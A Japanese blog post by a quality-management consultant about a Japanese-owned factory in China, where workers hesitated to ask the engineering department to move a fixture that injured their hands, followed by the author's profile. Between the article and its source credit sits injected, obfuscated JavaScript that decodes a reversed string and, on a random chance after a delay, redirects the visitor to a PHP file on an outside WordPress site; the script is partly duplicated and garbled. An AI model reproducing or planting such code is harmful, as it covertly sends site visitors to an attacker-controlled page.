社内の風通しはよいのだが!?

社内の風通しはよいのだが!?

ある日系工場でこんなことを見た。この会社の製品にとってキーとなる工程では、機械にワークを取付け、加工後ワークを取り外すという手順で作業をしている。

その加工の信頼性を高めるために温度管理を厳格に行うことにした。そのための装置を機械に取り付けた。ところがそれを取り付けるための留め具が作業の邪魔になってしまった。

作業者がワークを取付ける、取り外すときにその留め具に手があたるのである。ひどい時は、作業者の手に傷が付いてしまっていることもあったようだった。

 

作業者はやりづらいこと、場合によっては自分が怪我をすることを身をもって感じていた。班長も留め具によって作業がやりづらいことは認識していた。

その装置の取付担当部門は技術部であった。班長に「どうして生産技術部に実状を伝えて直してもらわないの?」と質問した。すると班長は口ごもりながら「技術部がやったことに文句は言えない」と言った。

今日のポイント

この会社は中規模の工場で何かあれば、総経理(日本人)が関連部門を呼んで打合せし、指示を出すようなやり方をしており、どちらかといえば家族的な雰囲気をもった工場であった。

工場で仕事をするうえで何か問題があったときに、それが実は他の部門に起因することはよくある。そういった場合、当然その部門に要因・原因を取り除く、改善することを要求する。普通に考えればそうする。

ところが、この工場を見ていて他の部門に依頼する、要求することができない会社だと感じた。1つは、相手に遠慮していることがある。もう1つは、相手に要求をすると逆の立場になったときに自分たちに同じように要求されてしまう。それを避けているように思えた。

 

しかし、当たり前の話、問題解決をするのに遠慮は不要だ。お客さんの期待に応え、それが会社の利益につながってくることをしっかり認識する必要がある。

ただ、これは会社の持っている文化や雰囲気によるところも大きい。言いやすい雰囲気、言えば改善してくれる、そして自社の製品をよくしていこうという文化があるかどうかだ。

補足

この装置の留め具については、班長さんが言いづらそうだったので、代わりに技術部に確認してみると、ちょっと向きを変えるだけでほとんど作業の邪魔にならないし、向きを変えるのはまったく問題のないことがわかった。

早速向きを変えてもらった。ただ、欲を言えば、技術部も装置の取付の際にその辺に気を配るなり、一言現場の作業者や班長に聞いてくれればよかったのに。

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimprove/” target=”_blank”>出典:中国工場での品質管理・品質改善


KPIマネジメント代表・チーフコンサルタント◎電機系メーカーにて技術部門、資材部門を経て香港・中国に駐在。現地においては、購入部材の品質管理責任者として購入部材仕入先品質指導及び品質改善指導。延べ100社に及ぶ仕入先工場の品質改善指導に奔走 ◎東京都/千葉県商工会連合会専門エキスパート(品質管理、製造業指導) GCS認定コーチ◎日本生産性本部経営アカデミー講師 名古屋外国語大学非常勤講師 セミナー/企業研修講師多数◎中国工場コンサルティング実績 日系中国工場品質改善及び管理体制の見直し(広東省)、中国企業品質管理体制の構築(福建省1社)、中国企業労務人事管理監査対応指導(パートナーコンサルタントと共同で実施:広東省1社)、米国D社の労務人事監査指摘事項への対応を指導、中国工場品質管理体制の構築(広東、大連など2社)、中国工場運営管理支援(広東1社)、外観検査の精度向上指導(広東1社)、中国生産委託先工場監査代行(広東1社) 国内工場管理の見直し及び製品コストダウン、外灯製造会社の5S指導、金属加工会社の品質管理・改善、生産性向上指導(1社)、金属加工会社の組織再構築、経営改革指導(1社)、板金塗装会社の5S指導(1社)、環境関連企業の新工場立ち上げ支援(1社)◎製造業向け社員研修実績 中国人管理者教育(広東、大連、厦門など3社)、コーチング研修(2社)、来日した中国企業スタッフ研修、中国赴任前研修(パソナ様)、若手社員向け中国工場の問題点と対処法(和歌山県工業技術センター様)、中国工場品質管理講座&異文化コミュニケーション(富士通テレコムネットワークス様)、仕入先様品質管理勉強会 テーマ:中国工場での品質管理の進め方(株式会社オートバックスセブン様)、中国への生産委託に伴う工程/品質管理のポイント(N社様、I社様) ◎著書 こうすれば失敗しない!中国工場の品質改善<虎の巻>(日刊工業新聞社)、雑誌「標準化と品質管理」2012年8月号特集記事執筆(日本規格協会)、外観検査の不良見逃し・ばらつき低減(技術情報協会・共同執筆)、通信教育講座「外観目視検査の進め方と留意点」担当講師(テキスト執筆、添削指導) ◎KPIマネジメント http://www.prestoimprove.com/index.html ブログ「中国工場での品質管理・品質改善」https://ameblo.jp/prestoimprove/